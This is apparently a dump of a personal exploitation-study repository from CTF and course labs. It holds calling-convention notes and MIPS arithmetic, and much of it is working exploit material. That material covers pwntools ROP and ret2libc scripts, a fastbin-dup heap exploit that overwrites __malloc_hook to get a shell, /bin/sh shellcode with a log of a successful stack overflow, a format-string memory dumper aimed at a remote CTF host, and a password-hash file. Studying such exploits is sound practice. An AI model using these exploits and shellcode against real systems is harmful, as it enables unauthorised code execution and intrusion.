have special entry code, generated by the va_start(), va_arg() C pseudo-functions. 10 | 11 | Consider the following C instructions: 12 | 13 | _cdecl int MyFunction1(int a, int b) 14 | { 15 | return a + b; 16 | } 17 | and the following function call: 18 | 19 | x = MyFunction1(2, 3); 20 | These would produce the following assembly listings, respectively: 21 | 22 | _MyFunction1: 23 | push ebp 24 | mov ebp, esp 25 | mov eax, [ebp + 8] 26 | mov edx, [ebp + 12] 27 | add eax, edx 28 | pop ebp 29 | ret 30 | and 31 | 32 | push 3 33 | push 2 34 | call _MyFunction1 35 | add esp, 8 36 | -------------------------------------------------------------------------------- /CallingConventions/FASTCALL: -------------------------------------------------------------------------------- 1 | FASTCALL 2 | The FASTCALL calling convention is not completely standard across all compilers, so it should be used with caution. In FASTCALL, the first 2 or 3 32-bit (or smaller) arguments are passed in registers, with the most commonly used registers being edx, eax, and ecx. Additional arguments, or arguments larger than 4-bytes are passed on the stack, often in Right-to-Left order (similar to CDECL). The calling function most frequently is responsible for cleaning the stack, if needed. 3 | 4 | Because of the ambiguities, it is recommended that FASTCALL be used only in situations with 1, 2, or 3 32-bit arguments, where speed is essential. 5 | 6 | The following C function: 7 | 8 | _fastcall int MyFunction3(int a, int b) 9 | { 10 | return a + b; 11 | } 12 | and the following C function call: 13 | 14 | x = MyFunction3(2, 3); 15 | Will produce the following assembly code fragments for the called, and the calling functions, respectively: 16 | 17 | :@MyFunction3@8 18 | push ebp 19 | mov ebp, esp ;many compilers create a stack frame even if it isn't used 20 | add eax, edx ;a is in eax, b is in edx 21 | pop ebp 22 | ret 23 | and 24 | 25 | ;the calling function 26 | mov eax, 2 27 | mov edx, 3 28 | call @MyFunction3@8 29 | -------------------------------------------------------------------------------- /MIPS/math.asm: -------------------------------------------------------------------------------- 1 | .data 2 | number1: .word 10 3 | number2: .word 5 4 | number3: .word 20 5 | number4: .word 8 6 | 7 | .text 8 | 9 | #SUMA 10 | lw $t0, number1($zero) 11 | lw $t1, number2($zero) 12 | add $t2, $t0, $t1 13 | 14 | li $v0,1 15 | add $a0, $zero, $t2 16 | syscall 17 | 18 | #RESTA 19 | lw $s0, number3 20 | lw $s1, number4 21 | 22 | sub $t0,$s0,$s1 23 | 24 | li $v0, 1 25 | move $a0,$t0 26 | syscall 27 | 28 | #MULTIPLICACION MUL 29 | addi $s0,$zero,10 30 | addi $s1,$zero,4 31 | 32 | mul $t0,$s0,$s1 33 | 34 | li $v0, 1 35 | add $a0,$zero,$t0 36 | syscall 37 | 38 | #MULTIPLICAION MULT 39 | addi $t0,$zero,2000 40 | addi $t1,$zero,10 41 | 42 | mult $t0,$t1 43 | mflo $s0 44 | li $v0, 1 45 | add $a0,$zero,$s0 46 | syscall 47 | 48 | #MULTIPLICACION SLL 49 | addi $s0,$zero,4 50 | sll, $t0, $s0, 3 51 | li $v0,1 52 | add $a0,$zero,$t0 53 | syscall 54 | 55 | #DIVISION 1 56 | addi $t0,$zero,30 57 | addi $t1,$zero,5 58 | 59 | div $s0, $t0, $t1 60 | 61 | li $v0, 1 62 | add $a0,$zero,$s0 63 | syscall 64 | 65 | #DIVISON 2 (PRINT REMAINDER) 66 | addi $t0,$zero,30 67 | addi $t1,$zero,8 68 | 69 | div $t0, $t1 70 | mflo $s0 71 | mfhi $s1 72 | li $v0,1 73 | add $a0,$zero,$s1 74 | syscall -------------------------------------------------------------------------------- /docker_suites/ubuntu20-pwndbg/README.md: -------------------------------------------------------------------------------- 1 | # Ubuntu20-pwndbg 2 | 3 | - Ubuntu 20.04 4 | - Gdb: 9.2 5 | - Python: 3.8.5 [GCC 9.3.0] 6 | - Pwndbg: 1.1.0 build: cd3cbf3 7 | - Capstone: 4.0.1024 8 | - Unicorn: 1.0.2 9 | 10 | ### How to use 11 | 12 | ##### Build image 13 | ``` 14 | docker build -t pwn20:0.0 . 15 | ``` 16 | ##### Run container to first time 17 | ``` 18 | docker run -v /path/to/volume:/root/shared --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -it --name pwn20 pwn20:0.0 bash 19 | ``` 20 | ##### Start container after run and exit 21 | ``` 22 | docker start pwn20 23 | ``` 24 | ##### Access the container 25 | ``` 26 | docker exec -ti pwn20 /bin/bash 27 | ``` 28 | ##### Stop the container 29 | ``` 30 | docker stop pwn20 31 | ``` 32 | ## Notes 33 | 34 | To run exploit, first create a virtual environment for the python version you prefer with virtualenv ... 35 | 36 | Python2.7: ```virtualenv -p /usr/bin/python2.7 /path/to/venv``` 37 | 38 | Python3: ```virtualenv -p /usr/bin/python3 /path/to/venv``` 39 | 40 | Start virtualenv 41 | ``` 42 | source path/to/venv/bin/activate 43 | ``` 44 | Install pwntools 45 | ``` 46 | pip install pwn 47 | ``` 48 | 49 | If you want debug with ```python exploit.py GDB NOASLR```, first you need start tmux. 50 | -------------------------------------------------------------------------------- /ROP/ROPX86/DEPnoASLR/pensando: -------------------------------------------------------------------------------- 1 | el system entra pero falla cuando llama a f7f116fd 2 | 3 | 0xffffd56c│+0x0000: 0xf7e195a0 → call 0xf7f116fd ← $esp 4 | 5 | ***************** 6 | 0xffffd56c│+0x0000: 0xf7e195a0 → call 0xf7f116fd ← $esp 7 | 8 | 0xffffd570│+0x0004: 0xdeadbeef 9 | 10 | 0xffffd574│+0x0008: 0xf7f58b35 → "/bin/sh" 11 | todo bien en la cola 12 | 13 | #$>>> alparecer salta aqui 14 | 15 | → 0x80491a6 ret 16 | ↳ 0xf7e195a0 call 0xf7f116fd 17 | 18 | #$>>> ee fd dice que mueve a edx lo de esp 19 | 20 | $esp : 0xffffd570 → 0xdeadbeef 21 | 22 | $eip : 0xf7e195a0 → call 0xf7f116fd 23 | 24 | → 0xf7e195a0 call 0xf7f116fd 25 | ↳ 0xf7f116fd mov edx, DWORD PTR [esp] 26 | 27 | 28 | #$>>> okey apesar de eso esta saltando a la ret fictisia y bin/sh esta como siguiente...entonces!! siguiente 29 | 30 | → 0xf7e195a0 call 0xf7f116fd 31 | 32 | CAMBIAIRA SI CAMBIO LA DIRECCION? 33 | 34 | orita lo intenamos mira esto 35 | 36 | la shell solo queda en pila pero el que falla es el return falso 37 | 38 | NOO ENTRA A BIN SH PERO REGRESA Y YA FALLA 39 | 40 | 41 | 42 | nueva estrategia... 43 | 44 | EXP= 45 | 46 | SOLO DESACTIVA ASLR, SE VUELVE A ACTIVAR '.' 47 | -------------------------------------------------------------------------------- /ROP/64LinuxROP/SOLvictimFSP: -------------------------------------------------------------------------------- 1 | 2 | 3 | ubuntu:~$ gcc shell.c 4 | ubuntu:~$ ./a.out 5 | $ 6 | 7 | objdump -d a.out | sed -n '/needle0/,/needle1/p' 8 | 9 | 10 | $ echo $((0x4dc-0x4bf)) #el principio y el final del programa 11 | 29 12 | 13 | 14 | 15 | $ xxd -s0x4bf -l32 -p a.out shellcode 16 | 17 | $ cat shellcode 18 | eb0e5f4831c0b03b4831f64831d20f05e8edffffff2f62696e2f736800ef 19 | bead 20 | 21 | 22 | 23 | $ gcc -fno-stack-protector -o victim victim.c 24 | 25 | 26 | 27 | $ execstack -s victim 28 | 29 | Lastly, we disable ASLR when running the binary: 30 | 31 | $ setarch `arch` -R ./victim 32 | What's your name? 33 | World 34 | Hello, World! 35 | 36 | One more cheat. We’ll simply print the buffer location: 37 | 38 | printf("%p\n", name); // Print address of buffer. 39 | 40 | $ setarch `arch` -R ./victim 41 | 0x7fffffffe090 42 | What's your name? 43 | 44 | $ a=`printf %016x 0x7fffffffe090 | tac -rs..` 45 | $ echo $a 46 | 90e0ffffff7f0000 47 | 48 | ((cat shellcode ; printf %080d 0 ; echo $a ) | xxd -r -p ; cat ) | setarch `arch` -R ./victimFSP 49 | 50 | 0x7fffffffe480 51 | What's your name? 52 | 53 | Hello, �_H1��;H1�H1������/bin/sh! 54 | 55 | id 56 | uid=1000(ivansk8421) gid=1000(ivansk8421) groups=1000(ivansk8421),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),118(lpadmin),129(sambashare) 57 | 58 | 59 | ### http://crypto.stanford.edu/~blynn/rop/ 60 | -------------------------------------------------------------------------------- /HEAP/syscallMalloc/mthread.c: -------------------------------------------------------------------------------- 1 | /* Per thread arena example. */ 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | void* threadFunc(void* arg) { 9 | printf("Before malloc in thread 1\n"); 10 | getchar(); 11 | char* addr = (char*) malloc(1000); 12 | printf("After malloc and before free in thread 1\n"); 13 | getchar(); 14 | free(addr); 15 | printf("After free in thread 1\n"); 16 | getchar(); 17 | } 18 | 19 | int main() { 20 | pthread_t t1; 21 | void* s; 22 | int ret; 23 | char* addr; 24 | 25 | printf("Welcome to per thread arena example::%d\n",getpid()); 26 | printf("Before malloc in main thread\n"); 27 | getchar(); 28 | addr = (char*) malloc(1000); 29 | printf("After malloc and before free in main thread\n"); 30 | getchar(); 31 | free(addr); 32 | printf("After free in main thread\n"); 33 | getchar(); 34 | ret = pthread_create(&t1, NULL, threadFunc, NULL); 35 | if(ret) 36 | { 37 | printf("Thread creation error\n"); 38 | return -1; 39 | } 40 | ret = pthread_join(t1, &s); 41 | if(ret) 42 | { 43 | printf("Thread join error\n"); 44 | return -1; 45 | } 46 | return 0; 47 | } 48 | -------------------------------------------------------------------------------- /shellcodeHandbook/SHELLCODE/test_shellcode2.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | char shellcode[] = "\xbb\x00\x00\x00\x00" 6 | "\xb8\x01\x00\x00\x00" 7 | "\xcd\x80"; 8 | 9 | /*char shellcode[] = "\xbb\x00\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80"; 10 | */ 11 | 12 | int main() 13 | { //printf("*********** SHELLCODE ***********\n"); 14 | //printf("SHELLCODE S: %s \n",shellcode); 15 | //printf("SHELLCODE D: %d \n",(int)shellcode); 16 | //printf("SHELLCODE P: %p \n",shellcode); 17 | //printf("LEN: %d \n",strlen(shellcode)); 18 | //printf("****************************\n\n"); 19 | //printf("*********** *RET ***********\n"); 20 | int *ret; 21 | //printf("P: %p \n",ret); 22 | //printf("I: %d \n",*ret); 23 | //printf("****************************\n\n"); 24 | //printf("***ret = (int *) &ret +2;***\n"); 25 | ret = (int *) &ret +2; 26 | //printf("P: %p \n",ret); 27 | //printf("I: %d \n",*ret); 28 | 29 | //printf("****************************\n\n"); 30 | //printf("***(*ret) = (int)shellcode;***\n"); 31 | (*ret) = (int)shellcode; 32 | //printf("P: %p \n",ret); 33 | //printf("I: %d \n",*ret); 34 | //printf("****************************\n\n"); 35 | //printf("SHELLCODE S: %s \n",shellcode); 36 | //printf("SHELLCODE D: %d \n",(int)shellcode); 37 | //printf("SHELLCODE P: %p \n",shellcode); 38 | //printf("LEN: %d n",strlen(shellcode)); 39 | } 40 | -------------------------------------------------------------------------------- /CallingConventions/STDCALL: -------------------------------------------------------------------------------- 1 | STDCALL 2 | STDCALL, also known as "WINAPI" (and a few other names, depending on where you are reading it) is used almost exclusively by Microsoft as the standard calling convention for the Win32 API. Since STDCALL is strictly defined by Microsoft, all compilers that implement it do it the same way. 3 | 4 | STDCALL passes arguments right-to-left, and returns the value in eax. (The Microsoft documentation erroneously claimed that arguments are passed left-to-right, but this is not the case.) 5 | The called function cleans the stack, unlike CDECL. This means that STDCALL doesn't allow variable-length argument lists. 6 | Consider the following C function: 7 | 8 | _stdcall int MyFunction2(int a, int b) 9 | { 10 | return a + b; 11 | } 12 | and the calling instruction: 13 | 14 | x = MyFunction2(2, 3); 15 | These will produce the following respective assembly code fragments: 16 | 17 | :_MyFunction2@8 18 | push ebp 19 | mov ebp, esp 20 | mov eax, [ebp + 8] 21 | mov edx, [ebp + 12] 22 | add eax, edx 23 | pop ebp 24 | ret 8 25 | and 26 | 27 | push 3 28 | push 2 29 | call _MyFunction2@8 30 | There are a few important points to note here: 31 | 32 | In the function body, the ret instruction has an (optional) argument that indicates how many bytes to pop off the stack when the function returns. 33 | STDCALL functions are name-decorated with a leading underscore, followed by an @, and then the number (in bytes) of arguments passed on the stack. This number will always be a multiple of 4, on a 32-bit aligned machine. 34 | -------------------------------------------------------------------------------- /ADWorld/STACK2/pwntools_template.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | 4 | elf = context.binary = ELF("stack2") 5 | libc = elf.libc 6 | 7 | gs = ''' 8 | continue 9 | ''' 10 | def start(): 11 | if args.GDB: 12 | return gdb.debug(elf.path, gdbscript=gs) 13 | else: 14 | return remote("220.249.52.133","56273") 15 | #return process(elf.path) 16 | 17 | # ============================================================================= 18 | 19 | def welcome(): 20 | print(p.sendlineafter("How many numbers you have:","1")) 21 | print(p.sendlineafter("Give me your numbers","1")) 22 | 23 | 24 | def change(offset,payload): 25 | print(p.sendlineafter("5. exit","3")) 26 | print(p.sendlineafter("which number to change:",offset)) 27 | print(p.sendlineafter("new number:",payload)) 28 | 29 | # ============================================================================= 30 | #ebp as 0xFFAE1358 *0xffffd0c8 31 | #esp as 0xFFAE136C *0xffffd0dc 32 | 33 | #ebp-0x70= 0xffffd058 34 | #0xffffd0dc-0xffffd058=0x84=132 35 | #system 0x8048450= 50 84 04 08 36 | #sh 0x8049987= 87 99 04 08 37 | p=start() 38 | 39 | welcome() 40 | change("132","80") 41 | change("133","132") 42 | change("134","4") 43 | change("135","8") 44 | change("140","135") 45 | change("141","153") 46 | change("142","4") 47 | change("143","8") 48 | print(p.sendlineafter("5. exit","5")) 49 | p.recv() 50 | # ============================================================================= 51 | 52 | p.interactive() 53 | #cyberpeace{e535c3e4acf36b2f10a0bc03a72b550c} 54 | -------------------------------------------------------------------------------- /HEAP/HeapLAB/challenge-fastbin_dup/passwords.txt: -------------------------------------------------------------------------------- 1 | root:!:18500:0:99999:7::: 2 | daemon:*:18480:0:99999:7::: 3 | bin:*:18480:0:99999:7::: 4 | sys:*:18480:0:99999:7::: 5 | sync:*:18480:0:99999:7::: 6 | games:*:18480:0:99999:7::: 7 | man:*:18480:0:99999:7::: 8 | lp:*:18480:0:99999:7::: 9 | mail:*:18480:0:99999:7::: 10 | news:*:18480:0:99999:7::: 11 | uucp:*:18480:0:99999:7::: 12 | proxy:*:18480:0:99999:7::: 13 | www-data:*:18480:0:99999:7::: 14 | backup:*:18480:0:99999:7::: 15 | list:*:18480:0:99999:7::: 16 | irc:*:18480:0:99999:7::: 17 | gnats:*:18480:0:99999:7::: 18 | nobody:*:18480:0:99999:7::: 19 | systemd-network:*:18480:0:99999:7::: 20 | systemd-resolve:*:18480:0:99999:7::: 21 | syslog:*:18480:0:99999:7::: 22 | messagebus:*:18480:0:99999:7::: 23 | _apt:*:18480:0:99999:7::: 24 | uuidd:*:18480:0:99999:7::: 25 | avahi-autoipd:*:18480:0:99999:7::: 26 | usbmux:*:18480:0:99999:7::: 27 | dnsmasq:*:18480:0:99999:7::: 28 | rtkit:*:18480:0:99999:7::: 29 | cups-pk-helper:*:18480:0:99999:7::: 30 | speech-dispatcher:!:18480:0:99999:7::: 31 | whoopsie:*:18480:0:99999:7::: 32 | kernoops:*:18480:0:99999:7::: 33 | saned:*:18480:0:99999:7::: 34 | avahi:*:18480:0:99999:7::: 35 | colord:*:18480:0:99999:7::: 36 | hplip:*:18480:0:99999:7::: 37 | geoclue:*:18480:0:99999:7::: 38 | pulse:*:18480:0:99999:7::: 39 | gnome-initial-setup:*:18480:0:99999:7::: 40 | gdm:*:18480:0:99999:7::: 41 | user:$6$bomYY69C$XHIBfhm/BGwigNJt9nmC5iXQDgWgbSauLEsDjBKWb26a3PasRqWCwUhY9QSEYSsDYvGcB6x553B63fIXtRHsT1:18500:0:99999:7::: 42 | mysql:!:18500:0:99999:7::: 43 | sshd:*:18545:0:99999:7::: 44 | -------------------------------------------------------------------------------- /HEAP/HeapLAB/house_of_orange/pwntools_template.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | 4 | elf = context.binary = ELF("house_of_orange") 5 | libc = elf.libc 6 | 7 | gs = ''' 8 | set breakpoint pending on 9 | break _IO_flush_all_lockp 10 | enable breakpoints once 1 11 | continue 12 | ''' 13 | def start(): 14 | if args.GDB: 15 | return gdb.debug(elf.path, gdbscript=gs) 16 | else: 17 | return process(elf.path) 18 | 19 | # Select the "malloc (small)" option. 20 | def small_malloc(): 21 | io.send("1") 22 | io.recvuntil("> ") 23 | 24 | # Select the "malloc (large)" option. 25 | def large_malloc(): 26 | io.sendthen("> ", "2") 27 | 28 | # Select the "edit (1st small chunk)" option; send data. 29 | def edit(data): 30 | io.send("3") 31 | io.sendafter("data: ", data) 32 | io.recvuntil("> ") 33 | 34 | io = start() 35 | 36 | # This binary leaks the address of puts(), use it to resolve the libc load address. 37 | io.recvuntil("puts() @ ") 38 | libc.address = int(io.recvline(), 16) - libc.sym.puts 39 | 40 | # This binary leaks the heap start address. 41 | io.recvuntil("heap @ ") 42 | heap = int(io.recvline(), 16) 43 | io.recvuntil("> ") 44 | io.timeout = 0.1 45 | 46 | # ============================================================================= 47 | 48 | # =-=-=- EXAMPLE -=-=-= 49 | 50 | # Request a small chunk. 51 | small_malloc() 52 | 53 | # Edit the 1st small chunk. 54 | edit(b"Y"*24) 55 | 56 | # Request a large chunk. 57 | large_malloc() 58 | 59 | # ============================================================================= 60 | 61 | io.interactive() 62 | -------------------------------------------------------------------------------- /ROP/ROPX86/DEP_ASLR/exp2.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import struct 3 | 4 | 5 | libc = ELF('libc.so') 6 | elf = ELF('level3') 7 | 8 | p = process('./level3') 9 | #p = remote('127.0.0.1', 10003) 10 | 11 | plt_write = elf.symbols['write'] 12 | print 'plt_write= ' + hex(plt_write) 13 | got_write = elf.got['write'] 14 | print 'got_write= ' + hex(got_write) 15 | vulfun_addr = 0x8049172 16 | print 'vulfun= ' + hex(vulfun_addr) 17 | 18 | 19 | 20 | #payload1 = 'a'*140 + hex(plt_write) + hex(vulfun_addr) + hex(1)+ hex(got_write)+ hex(4) 21 | 22 | payload1 = 'a'*140 + struct.pack("I", plt_write) + struct.pack("I",vulfun_addr) + struct.pack("I",1) +struct.pack("I",got_write)+ struct.pack("I",4) 23 | 24 | 25 | print payload1 26 | print "\n###sending payload1 ...###" 27 | p.send(payload1) 28 | 29 | print "\n###receving write() addr...###" 30 | write_addr = u32(p.recv(4)) 31 | print 'write_addr=' + hex(write_addr) ##############direccion write 32 | 33 | # print "\n###calculating system() addr and \"/bin/sh\" addr...###" 34 | # libcwrite=libc.symbols['write'] 35 | 36 | # print "libcwrite "+hex(libcwrite) 37 | # libcsystem=libc.symbols['system'] 38 | # print "libcsystem "+hex(libcsystem) 39 | 40 | # resta=libcwrite-libcsystem 41 | # print(hex(resta)) 42 | 43 | # system_addr = write_addr - resta 44 | 45 | # print 'system_addr= ' + hex(system_addr) 46 | # binsh_addr = write_addr - (libc.symbols['write'] - next(libc.search('/bin/sh'))) 47 | # print 'binsh_addr= ' + hex(binsh_addr) 48 | 49 | # payload2 = 'a'*140 + p32(system_addr) + p32(vulfun_addr) + p32(binsh_addr) 50 | 51 | # print "###sending payload2 ...###" 52 | # p.send(payload2) 53 | 54 | # p.interactive() 55 | -------------------------------------------------------------------------------- /Nightmare/stackOverflow/DINAMIC-BOF/08-bof_dynamic/hs19_storytime/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # Establisht the target 4 | target = process('./storytime', env={"LD_PRELOAD":"./libc.so.6"}) 5 | gdb.attach(target) 6 | #gdb.attach(target, gdbscript = 'b *0x40060e') 7 | #target = remote("pwn.hsctf.com", 3333) 8 | 9 | # Establish the libc version 10 | libc = ELF('libc.so.6') 11 | #libc = ELF('libc-2.27.so') 12 | 13 | 14 | #0x0000000000400701 : pop rsi ; pop r15 ; ret 15 | popRsiR15 = p64(0x400701) 16 | 17 | # Got address of write 18 | writeGot = p64(0x601018) 19 | 20 | # Filler to reach the return address 21 | payload = "0"*0x38 22 | 23 | # Pop the got entry of write into r15 24 | payload += popRsiR15 25 | payload += writeGot 26 | payload += p64(0x3030303030303030) # Filler value will be popped into r15 27 | 28 | # Right before write call in end 29 | payload += p64(0x400601) 30 | 31 | # Filler value that will be popped off in end 32 | payload += p64(0x3030303030303030) 33 | 34 | # Address of climax, we will exploit another buffer overflow to use the rop gadget 35 | payload += p64(0x40060e) 36 | 37 | # Send the payload 38 | target.sendline(payload) 39 | 40 | # Scan in some of the output 41 | print target.recvuntil("Tell me a story: \n") 42 | 43 | # Scan in and filter out the libc infoleak, calculate base of libc 44 | leak = u64(target.recv(8)) 45 | base = leak - libc.symbols["write"] 46 | print hex(base) 47 | 48 | # Calculate the oneshot gadget 49 | oneshot = base + 0x4526a 50 | 51 | # Make the payload for the onshot gadget 52 | payload = "1"*0x38 + p64(oneshot) 53 | 54 | # Send it and get a shell 55 | target.sendline(payload) 56 | target.interactive() 57 | -------------------------------------------------------------------------------- /HEAP/HeapLAB/fastbin_dup/README.md: -------------------------------------------------------------------------------- 1 | ## Fastbin with Use-After-Free 2 | ***************************************** 3 | 1.- Request two 0x50 size chunk 4 | ``` 5 | chunk_A = malloc(24, b"A"*24) 6 | chunk_B = malloc(24, b"B"*24) 7 | ``` 8 | ![imagen1.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/fastbin_dup/assets/Imagen1.png) 9 | 10 | 2.- Free chunk A 11 | ``` 12 | free(chunk_A) 13 | ``` 14 | ![imagen2.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/fastbin_dup/assets/Imagen2.png) 15 | 16 | 3.- Free chunk B 17 | ``` 18 | free(chunk_B) 19 | ``` 20 | ![imagen3.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/fastbin_dup/assets/Imagen3.png) 21 | 22 | 4.- Free chunk A 23 | ``` 24 | free(chunk_A) 25 | ``` 26 | ![imagen4.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/fastbin_dup/assets/Imagen4.png) 27 | 28 | 5.- malloc(24,b'C'*24) 29 | ``` 30 | malloc(24,b'C'*24) 31 | ``` 32 | ![imagen5.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/fastbin_dup/assets/Imagen5.png) 33 | 34 | 6.- There are the CCCCCCC… where before was the 7020 pointer :O, so where will do now the Ds malloc? 35 | ``` 36 | malloc(24,b'D'*24) 37 | ``` 38 | ![imagen6.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/fastbin_dup/assets/Imagen6.png) 39 | 40 | 7.- Yes, in the next chunk linked in the 0x20 fastbin list... 41 | So now we will send some EEEE's 42 | ``` 43 | malloc(24,b'E'*24) 44 | ``` 45 | ![imagen7.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/fastbin_dup/assets/Imagen7.png) 46 | 47 | And now we can note that we controll where the next 0x20 fastbin will be allocated. 48 | 49 | ## References 50 | 51 | Max Kamper, Linux Heap Exploitation - Part 1, Udemy 3(9-11) -------------------------------------------------------------------------------- /execv/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | #execvegeneratedbyROPgadget 3 | 4 | from struct import pack 5 | 6 | #Paddinggoeshere 7 | p='' 8 | p+="A"*52 9 | p+=pack(' pip 48 | 49 | and after hitting enter a few times, we can enter shell commands. 50 | 51 | -------------------------------------------------------------------------------- /HEAP/HeapLAB/fastbin_dup/exploit-write.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | 4 | elf = context.binary = ELF("fastbin_dup") 5 | libc = elf.libc 6 | 7 | gs = ''' 8 | continue 9 | ''' 10 | def start(): 11 | if args.GDB: 12 | return gdb.debug(elf.path, gdbscript=gs) 13 | else: 14 | return process(elf.path) 15 | 16 | # Index of allocated chunks. 17 | index = 0 18 | 19 | # Select the "malloc" option; send size & data. 20 | # Returns chunk index. 21 | def malloc(size, data): 22 | global index 23 | io.send("1") 24 | io.sendafter("size: ", f"{size}") 25 | io.sendafter("data: ", data) 26 | io.recvuntil("> ") 27 | index += 1 28 | return index - 1 29 | 30 | # Select the "free" option; send index. 31 | def free(index): 32 | io.send("2") 33 | io.sendafter("index: ", f"{index}") 34 | io.recvuntil("> ") 35 | 36 | io = start() 37 | 38 | # This binary leaks the address of puts(), use it to resolve the libc load address. 39 | io.recvuntil("puts() @ ") 40 | libc.address = int(io.recvline(), 16) - libc.sym.puts 41 | io.timeout = 0.1 42 | 43 | # ============================================================================= 44 | 45 | # =-=-=- EXAMPLE -=-=-= 46 | 47 | # Set the username field. 48 | username = p64(0)+p64(0x31) 49 | io.sendafter("username: ", username) 50 | io.recvuntil("> ") 51 | 52 | # Request two 0x30-sized chunks and fill them with data. 53 | chunk_A = malloc(0x28, "A"*0x28) 54 | chunk_B = malloc(0x28, "B"*0x28) 55 | 56 | # Free the first chunk, then the second. 57 | free(chunk_A) 58 | free(chunk_B) 59 | free(chunk_A) 60 | 61 | dup = malloc(0x28, p64(elf.sym.user)) 62 | 63 | # # Program symbols are available via "elf.sym.". 64 | chunk_A = malloc(0x28, "Y") 65 | chunk_B = malloc(0x28, "Y") 66 | chunk_A = malloc(0x28, "I WIN B)") 67 | # # ============================================================================= 68 | 69 | io.interactive() 70 | -------------------------------------------------------------------------------- /Templates/leak_binary_fs.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | import struct 3 | from pwn import * 4 | 5 | context.log_level = "DEBUG" 6 | context.timeout = 5 7 | gs = ''' 8 | continue 9 | ''' 10 | 11 | # 0x400934 12 | 13 | def start(): 14 | if args.GDB: 15 | return gdb.debug(elf.path, gdbscript=gs) 16 | else: 17 | return remote('covidless.insomnihack.ch', 6666) 18 | 19 | 20 | def read_until(io,msg): 21 | out=b'' 22 | # try: 23 | out+=io.recvuntil(msg) 24 | print(out) 25 | return out 26 | # except: return str(out) 27 | 28 | 29 | def dump(io,addr, frmt=b's'): 30 | print('type> ',type(frmt)) 31 | raw_adr= p64(addr) 32 | if b'\n' in raw_adr: 33 | return b"" 34 | eof=b'EOF_espr' 35 | leak_part= b'|%19$'+ frmt+b'|EOF_espr' 36 | out=b'' 37 | out+= leak_part.ljust(71-len(leak_part)-len(eof),b'A') 38 | out+=eof 39 | out+=p64(addr) 40 | # out+=leak_part 41 | io.sendline(out) 42 | r= read_until(io,'|EOF_espr') 43 | print('r> ',r) 44 | if len(r.split(b'|'))<2: 45 | print(r) 46 | input() 47 | return r.split(b'|')[1] 48 | 49 | 50 | 51 | io = start() 52 | # for i in range(1,10): 53 | 54 | startb= 0x400934 55 | addr= startb 56 | binfile= b'' 57 | 58 | 59 | # addr=0x400000 60 | # i=1 61 | # m=4096 62 | # while True: 63 | # with open('dump', 'ab') as f: 64 | # leak=b'' 65 | # print("[*] leak 0x{:08x}".format(addr)) 66 | # leak+=dump(io, addr,b's') 67 | # leak+=b'\x00' 68 | # addr+= len(leak) 69 | # f.write(leak) 70 | # f.flush() 71 | # i=i+1 72 | 73 | 74 | 75 | 76 | # # io.recvline() 77 | io.interactive() 78 | # 0x400934 79 | # 0x7ffdf9bbaba0 80 | # 0x400890 81 | # 0x7f95d42c6b97 82 | # 0x7ffdf9bbaba8 83 | # 0x40075a 84 | # 0x400650 85 | # 0x7ffdf9bbaba0 86 | 87 | # 00000610 88 | # 00000620 89 | # 00000630 90 | # 00000600 91 | # 00000600 92 | # 000005e0 93 | # 00000640 94 | # 00000737 -------------------------------------------------------------------------------- /HEAP/HeapLAB/fastbin_dup/exploit-shell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | 4 | elf = context.binary = ELF("fastbin_dup") 5 | libc = elf.libc 6 | 7 | gs = ''' 8 | continue 9 | ''' 10 | def start(): 11 | if args.GDB: 12 | return gdb.debug(elf.path, gdbscript=gs) 13 | else: 14 | return process(elf.path) 15 | 16 | # Index of allocated chunks. 17 | index = 0 18 | 19 | # Select the "malloc" option; send size & data. 20 | # Returns chunk index. 21 | def malloc(size, data): 22 | global index 23 | io.send("1") 24 | io.sendafter("size: ", f"{size}") 25 | io.sendafter("data: ", data) 26 | io.recvuntil("> ") 27 | index += 1 28 | return index - 1 29 | 30 | # Select the "free" option; send index. 31 | def free(index): 32 | io.send("2") 33 | io.sendafter("index: ", f"{index}") 34 | io.recvuntil("> ") 35 | 36 | io = start() 37 | 38 | # This binary leaks the address of puts(), use it to resolve the libc load address. 39 | io.recvuntil("puts() @ ") 40 | libc.address = int(io.recvline(), 16) - libc.sym.puts 41 | io.timeout = 0.1 42 | 43 | # ============================================================================= 44 | 45 | # =-=-=- EXAMPLE -=-=-= 46 | 47 | # Set the username field. 48 | username = p64(0)+p64(0x31) 49 | io.sendafter("username: ", username) 50 | io.recvuntil("> ") 51 | 52 | # Request two 0x30-sized chunks and fill them with data. 53 | chunk_A = malloc(0x68, "A"*0x68) 54 | chunk_B = malloc(0x68, "B"*0x68) 55 | 56 | # Free the first chunk, then the second. 57 | free(chunk_A) 58 | free(chunk_B) 59 | free(chunk_A) 60 | 61 | dup = malloc(0x68, p64(libc.sym.__malloc_hook - 35)) 62 | 63 | # # Program symbols are available via "elf.sym.". 64 | chunk_A = malloc(0x68, "Y") 65 | chunk_B = malloc(0x68, "Y") 66 | chunk_A = malloc(0x68, b"X"*19 + p64(libc.address + 0xe1fa1 )) 67 | 68 | malloc(1," ") 69 | # # ============================================================================= 70 | 71 | io.interactive() 72 | -------------------------------------------------------------------------------- /Templates/leak_libc.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import os 3 | import random 4 | import time 5 | 6 | context.binary ='./orxw' 7 | elf=context.binary 8 | libc = 